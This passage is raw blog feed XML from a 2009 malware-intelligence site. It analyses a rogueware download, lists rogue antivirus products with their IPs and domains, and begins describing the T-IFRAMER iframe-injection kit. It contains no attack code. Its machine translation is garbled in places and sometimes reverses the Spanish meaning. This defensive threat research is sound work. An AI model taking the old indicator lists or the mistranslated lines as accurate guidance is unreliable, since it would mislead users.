style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 81px;" src="http://4.bp.blogspot.com/_gJDtaXmerr4/Swb-x3FQJCI/AAAAAAAAAZM/Xyv3wD5cXzc/s400/www.internetsecurity2.com_1258749620999.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5406288535257883682" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;DNS Analysis Report:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gJDtaXmerr4/Swb_Mnwu1FI/AAAAAAAAAZU/rGa6Xd0oN_c/s1600/2www.internetsecurity2.com_1258749712932.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 225px;" src="http://1.bp.blogspot.com/_gJDtaXmerr4/Swb_Mnwu1FI/AAAAAAAAAZU/rGa6Xd0oN_c/s400/2www.internetsecurity2.com_1258749712932.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5406288995001750610" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Conclusion:&lt;br /&gt;In conclusion, the site it is being hosted on "internetsecurity2", hosts many malicious malwares as listed above. Watch out for what you download, and never think that the HASH listing is only for the geeks. All the above data, were solely derived from the MD5 generated from the EXE.&lt;br /&gt;&lt;br /&gt;Couldn't load the EXE into &lt;a href="http://anubis.iseclab.org/"&gt;Anubis&lt;/a&gt;, as Anubis is having heavy delay for some reason. But yeah, if you have any further analysis that you wish to share with us, that would be awesome. Contact us at contact.fingers @ gmail. com if you have any queries or concerns.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-1604109321878908343?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/1604109321878908343/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=1604109321878908343' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1604109321878908343'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/1604109321878908343'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/is-this-rogueware.html' title='Is this a Rogueware?'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_gJDtaXmerr4/Swb3CWDUStI/AAAAAAAAAYs/CrhxJ1JhXS0/s72-c/Avanquest_system_suite2' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-2224089631052170164</id><published>2009-11-18T14:06:00.001-11:00</published><updated>2009-11-18T14:08:39.343-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware Intelligence'/><category scheme='http://www.blogger.com/atom/ns#' term='scareware'/><title type='text'>A recent tour of scareware XVIII</title><content type='html'>&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Virus Protector&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;= AntiAID, SystemVeteran, BlockProtector&lt;/span&gt;, &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;SystemWarrior&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/Sv4I7iv-qEI/AAAAAAAAB64/fUT2mg1Jdc0/s1600-h/vp.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 134px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/Sv4I7iv-qEI/AAAAAAAAB64/fUT2mg1Jdc0/s200/vp.png" alt="" id="BLOGGER_PHOTO_ID_5403766421924522050" border="0" /&gt;&lt;/a&gt;IP: 85.12.25.111, 83.233.30.66&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/nl.gif" alt="Netherlands" width="18" height="12" /&gt;           Netherlands          Eindhoven          Web10 Ict Services  &lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/se.gif" alt="Sweden" width="18" height="12" /&gt;         Sweden        Stockholm        Serverconnect I Norrland&lt;br /&gt;Dominios asociados&lt;br /&gt;antiaid.com&lt;br /&gt;blockkeeper.com&lt;br /&gt;blockprotector.com&lt;br /&gt;systemveteran.com&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Pope Green Defender&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sv4YgoBQSXI/AAAAAAAAB7A/sUIli6MaBVU/s1600-h/pgd.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sv4YgoBQSXI/AAAAAAAAB7A/sUIli6MaBVU/s200/pgd.png" alt="" id="BLOGGER_PHOTO_ID_5403783551668734322" border="0" /&gt;&lt;/a&gt;IP: 99.198.98.217&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;         United States        Chicago        Singlehop Inc&lt;br /&gt;Dominios asociados&lt;br /&gt;popegreen.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Spyware Defender 2009&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sv4ZKTxhqfI/AAAAAAAAB7I/_Fq7ZYh7sCg/s1600-h/sd2009.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 146px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sv4ZKTxhqfI/AAAAAAAAB7I/_Fq7ZYh7sCg/s200/sd2009.png" alt="" id="BLOGGER_PHOTO_ID_5403784267788560882" border="0" /&gt;&lt;/a&gt;IP: 99.198.98.218&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;         United States        Chicago        Singlehop Inc&lt;br /&gt;Dominios asociados&lt;br /&gt;cheelumtech.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Pro Defender 2008&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/Sv4ZrAawrTI/AAAAAAAAB7Q/44vwdWAdfio/s1600-h/pd.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 194px; height: 200px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/Sv4ZrAawrTI/AAAAAAAAB7Q/44vwdWAdfio/s200/pd.png" alt="" id="BLOGGER_PHOTO_ID_5403784829528485170" border="0" /&gt;&lt;/a&gt;IP: 99.198.98.202&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;         United States        Chicago        Singlehop Inc&lt;br /&gt;Dominios asociados&lt;br /&gt;vlachosoft.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;&lt;br /&gt;&lt;br /&gt;Proof Defender&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Sv4bFbQYeHI/AAAAAAAAB7Y/vWSrbDR0etc/s1600-h/proofdefender.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 154px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Sv4bFbQYeHI/AAAAAAAAB7Y/vWSrbDR0etc/s200/proofdefender.png" alt="" id="BLOGGER_PHOTO_ID_5403786382920939634" border="0" /&gt;&lt;/a&gt;IP: 76.76.101.85&lt;br /&gt;&lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;         United States        Portland        Donald Wildes&lt;br /&gt;Dominios asociados&lt;br /&gt;proofdefender.com&lt;br /&gt;proofdefender2009.com&lt;br /&gt;www.pdefender2009.com&lt;br /&gt;www.proofdefender.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;techno-rescue.com (209.8.45.117) &lt;img src="http://img.domaintools.com/flags/us.gif" alt="United States" width="18" height="12" /&gt;         Herndon        Beyond The Network America&lt;br /&gt;besttoolsdirect.com (193.169.234.3) &lt;img src="http://img.domaintools.com/flags/jm.gif" alt="Jamaica" width="18" height="12" /&gt;         Jamaica                Titan-net Ltd&lt;br /&gt;rfastnet.com/online (213.155.22.193) &lt;img src="http://img.domaintools.com/flags/ua.gif" alt="Ukraine" width="18" height="12" /&gt;         Ukraine        Kiev        Singhajeet3 - Singh Ajeet&lt;br /&gt;advanced-&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/7f3cad134c3cfc1130f4dfe6b0e074fb68bd0b6a3eaf8c9d588c685550bc2fc2-1258167195"&gt;virus-remover2010.com&lt;/a&gt; (91.207.116.55) &lt;img src="http://img.domaintools.com/flags/ua.gif" alt="Ukraine" width="18" height="12" /&gt;         Ukraine                Czech Republic Of Rays&lt;br /&gt;10-open-davinci.com&lt;br /&gt;advanced-virus-remover2010.com&lt;br /&gt;advanced-virusremover-2009.com&lt;br /&gt;advanced-virusremover2009.com&lt;br /&gt;advancedvirus-remover-2010.com&lt;br /&gt;advancedvirusremover-2009.com&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sv4cKD6-uYI/AAAAAAAAB7g/yKg2dh6Lmtk/s1600-h/virusremover.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 98px; height: 320px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Sv4cKD6-uYI/AAAAAAAAB7g/yKg2dh6Lmtk/s320/virusremover.png" alt="" id="BLOGGER_PHOTO_ID_5403787562068130178" border="0" /&gt;&lt;/a&gt;best-scan-pc.com&lt;br /&gt;best-scan-pc.net&lt;br /&gt;best-scan.com&lt;br /&gt;best-scanpc.com&lt;br /&gt;best-scanpc.net&lt;br /&gt;best-scanpc.org&lt;br /&gt;cathrynzfunz.com&lt;br /&gt;coolcount1.com&lt;br /&gt;downloadavr6.com&lt;br /&gt;downloadavr7.com&lt;br /&gt;downloadavr8.com&lt;br /&gt;hard-xxx-tube.com&lt;br /&gt;testavrdown.com&lt;br /&gt;testavrdownnew.com&lt;br /&gt;vsproject.net&lt;br /&gt;www.advanced-virus-remover-2009.com&lt;br /&gt;www.advancedvirus-remover2009.com&lt;br /&gt;www.advancedvirusremover-2009.com&lt;br /&gt;www.best-scan-pc.com&lt;br /&gt;www.best-scanpc.net&lt;br /&gt;www.best-scanpc.org&lt;br /&gt;www.hard-xxx-tube.com&lt;br /&gt;www.onlinescanxppro.com&lt;br /&gt;xxx-white-tube.net&lt;br /&gt;xxx-white-tube.org&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://www.virustotal.com/analisis/0d33d11bf2b1beb690b2e88628403ef0faa2ba9d678bca75ac2b970f12e0974f-1258221983"&gt;argentmarketingtools.com&lt;/a&gt; (194.60.205.20) &lt;img src="http://img.domaintools.com/flags/ru.gif" alt="Russian Federation" width="18" height="12" /&gt;         Russian Federation                Baltic Center Of Innovations Techprominvest Ltd  &lt;br /&gt;thetoolsbargain.com, bestalltools.com (62.90.136.210) &lt;img src="http://img.domaintools.com/flags/il.gif" alt="Israel" width="18" height="12" /&gt;         Israel        Haifa        Loads  &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 0);"&gt;Información relacionada&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/una-recorrida-por-los-ultimos-scareware_27.html"&gt;Una recorrida por los últimos scareware XVII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware XV&lt;/a&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/una-recorrida-por-los-ultimos-scareware.html"&gt;I&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/una-recorrida-por-los-ultimos-scareware_26.html"&gt;Una recorrida por los últimos scareware XV&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware XIV&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/una-recorrida-por-los-ultimos-scareware_24.html"&gt;Una recorrida por los últimos scareware XIII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware XII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware XI&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/una-recorrida-por-los-ultimos-scareware_29.html"&gt;Una recorrida por los últimos scareware X&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware IX&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/una-recorrida-por-los-ultimos-scareware_29.html"&gt;Una recorrida por los últimos scareware VIII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/una-recorrida-por-los-ultimos-scareware_10.html"&gt;Una recorrida por los últimos scareware VII&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware VI&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/una-recorrida-por-lo-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware V&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/una-recorrida-por-los-ultimos-scareware_24.html"&gt;Una recorrida por los últimos scareware IV&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware III&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/01/una-recorrida-por-los-ltimos-scareware_17.html"&gt;Una recorrida por los últimos scareware II&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/01/una-recorrida-por-los-ltimos-scareware.html"&gt;Una recorrida por los últimos scareware I&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence Blog&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-2224089631052170164?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/2224089631052170164/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=2224089631052170164' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2224089631052170164'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/2224089631052170164'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/recent-tour-of-scareware-xviii.html' title='A recent tour of scareware XVIII'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Ppq0fEGkHo4/Sv4I7iv-qEI/AAAAAAAAB64/fUT2mg1Jdc0/s72-c/vp.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5008722736625809194</id><published>2009-11-15T23:00:00.000-11:00</published><updated>2009-11-15T23:00:03.203-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='gumblar'/><category scheme='http://www.blogger.com/atom/ns#' term='Crimeware'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>T-IFRAMER. Kit for the injection of malware In-the-Wild</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="T-IFRAMER  es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas  iframe , y alimentar su  botnet . A continuación vemos una captura de la pantalla de autenticación."&gt;T-IFRAMER &lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="T-IFRAMER  es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas  iframe , y alimentar su  botnet . A continuación vemos una captura de la pantalla de autenticación."&gt;is a package that allows you to automate, centralize and manage via http the spread of malicious code via code injection sites violated viral techniques using &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="T-IFRAMER  es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas  iframe , y alimentar su  botnet . A continuación vemos una captura de la pantalla de autenticación."&gt;iframe, and feed a&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="T-IFRAMER  es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas  iframe , y alimentar su  botnet . A continuación vemos una captura de la pantalla de autenticación."&gt; &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="T-IFRAMER  es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas  iframe , y alimentar su  botnet . A continuación vemos una captura de la pantalla de autenticación."&gt;botnet&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="T-IFRAMER  es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas  iframe , y alimentar su  botnet . A continuación vemos una captura de la pantalla de autenticación."&gt;. We then see a screen capture of authentication.&lt;/span&gt;&lt;span style="display: inline;" title="T-IFRAMER  es un paquete que permite automatizar, centralizar y gestionar vía http la propagación de códigos maliciosos a través de inyección de código viral en sitios web vulnerados empleando técnicas  iframe , y alimentar su  botnet . A continuación vemos una captura de la pantalla de autenticación."&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SwBr95WebMI/AAAAAAAAB7o/rOygOyEJQhI/s1600-h/mipistus-tiframer-auth.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SwBr95WebMI/AAAAAAAAB7o/rOygOyEJQhI/s400/mipistus-tiframer-auth.png" alt="" id="BLOGGER_PHOTO_ID_5404438263955877058" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de  malware  a través del protocolo http utilizando ataques del tipo  Drive-by-Download  y  Drive-by-Injection  mediante la inserción de etiquetas iframe en las páginas web vulneradas."&gt;While there is a complex kit allows computer criminals manage the spread of &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de  malware  a través del protocolo http utilizando ataques del tipo  Drive-by-Download  y  Drive-by-Injection  mediante la inserción de etiquetas iframe en las páginas web vulneradas."&gt;malware&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de  malware  a través del protocolo http utilizando ataques del tipo  Drive-by-Download  y  Drive-by-Injection  mediante la inserción de etiquetas iframe en las páginas web vulneradas."&gt; via the http protocol type attacks using &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/01/ataque-de-malware-va-drive-by-download.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de  malware  a través del protocolo http utilizando ataques del tipo  Drive-by-Download  y  Drive-by-Injection  mediante la inserción de etiquetas iframe en las páginas web vulneradas."&gt;Drive-by-Download&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de  malware  a través del protocolo http utilizando ataques del tipo  Drive-by-Download  y  Drive-by-Injection  mediante la inserción de etiquetas iframe en las páginas web vulneradas."&gt; and &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/drive-by-update-para-propagacion-de.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de  malware  a través del protocolo http utilizando ataques del tipo  Drive-by-Download  y  Drive-by-Injection  mediante la inserción de etiquetas iframe en las páginas web vulneradas."&gt;Drive-by-Injection&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Si bien no se trata de un kit complejo, permite a los delincuentes informáticos gestionar la propagación de  malware  a través del protocolo http utilizando ataques del tipo  Drive-by-Download  y  Drive-by-Injection  mediante la inserción de etiquetas iframe en las páginas web vulneradas."&gt; by inserting iframe tags in web pages violated.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;The four key modules: &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;Stats&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;,&lt;/span&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt; &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;Manager&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;,&lt;/span&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt; &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;Iframes&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt; and &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;Injector&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;, and each has the main function to optimize the spread of malware.&lt;/span&gt;&lt;span style="display: inline;" title="Los módulos principales son cuatro:  Stats ,  Manager ,  Iframes  e  Injector ; y cada uno de ellos posee la función principal de optimizar la diseminación de malware."&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="display: inline;" title="El primero de ellos ( Stats ) permite administrar cuentas ftp vulneradas teniendo control sobre ellas con la posibilidad de subir archivos. De esta manera, comienza uno de los ciclos de propagación de códigos maliciosos."&gt;The first one &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="El primero de ellos ( Stats ) permite administrar cuentas ftp vulneradas teniendo control sobre ellas con la posibilidad de subir archivos. De esta manera, comienza uno de los ciclos de propagación de códigos maliciosos."&gt;(Stats) &lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="El primero de ellos ( Stats ) permite administrar cuentas ftp vulneradas teniendo control sobre ellas con la posibilidad de subir archivos. De esta manera, comienza uno de los ciclos de propagación de códigos maliciosos."&gt;to manage FTP accounts violated having control over them with the ability to upload files. Thus begins one of the cycles of propagation of malicious code.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SwBsc7hKsJI/AAAAAAAAB7w/Doxl6LyU50w/s1600-h/mipistus-tiframer-accounts.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 301px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SwBsc7hKsJI/AAAAAAAAB7w/Doxl6LyU50w/s400/mipistus-tiframer-accounts.png" alt="" id="BLOGGER_PHOTO_ID_5404438797113536658" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Este módulo de gestión posee varias categorías, entre las que se encuentran:"&gt;The management module has several categories, among which are:&lt;/span&gt;&lt;br /&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Iframed accounts  ( cuentas iframeadas ). Son las páginas a las que se le ha inyectado  scripts dañinos  a través de la etiqueta iframe."&gt;Iframe accounts&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Iframed accounts  ( cuentas iframeadas ). Son las páginas a las que se le ha inyectado  scripts dañinos  a través de la etiqueta iframe."&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Iframed accounts  ( cuentas iframeadas ). Son las páginas a las que se le ha inyectado  scripts dañinos  a través de la etiqueta iframe."&gt;. These are pages that have been injected &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/04/scripting-attack-ii-conjuncion-de.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Iframed accounts  ( cuentas iframeadas ). Son las páginas a las que se le ha inyectado  scripts dañinos  a través de la etiqueta iframe."&gt;malicious scripts&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Iframed accounts  ( cuentas iframeadas ). Son las páginas a las que se le ha inyectado  scripts dañinos  a través de la etiqueta iframe."&gt; through the iframe 